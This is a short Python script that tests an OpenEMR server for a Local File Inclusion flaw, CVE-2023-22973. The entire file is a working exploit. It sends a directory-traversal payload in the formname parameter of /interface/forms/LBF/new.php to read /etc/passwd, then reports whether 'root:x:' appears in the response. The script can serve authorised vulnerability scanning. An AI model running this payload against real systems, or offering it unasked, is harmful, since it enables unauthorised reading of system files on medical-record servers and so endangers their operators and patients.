#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: cbk914
import argparse
import requests

# Create the command-line arguments parser
parser = argparse.ArgumentParser(description='Check for Local File Inclusion vulnerability in OpenEMR.')
parser.add_argument('-t', '--target', help='The target URL to check.', required=True)
parser.add_argument('-o', '--output', help='The output file in txt format.', required=True)

# Parse the command-line arguments
args = parser.parse_args()

# Build the target URL with the formname parameter set to the LFI payload
url = f'{args.target}/interface/forms/LBF/new.php?formname=../../../../../../../../../../../etc/passwd'

# Send the HTTP request to the target URL
response = requests.get(url)

# Check the HTTP response and write the output to the specified file
if response.status_code == 200 and 'root:x:' in response.text:
    print('The Local File Inclusion vulnerability is present in the target system.')
    with open(args.output, 'w') as file:
        file.write('The Local File Inclusion vulnerability CVE-2023-22973 is present in the target system.')
else:
    print('The target system does not appear to be vulnerable to the Local File Inclusion vulnerability CVE-2023-22973.')
    with open(args.output, 'w') as file:
        file.write('The target system does not appear to be vulnerable to the Local File Inclusion vulnerabilityCVE-2023-22973.')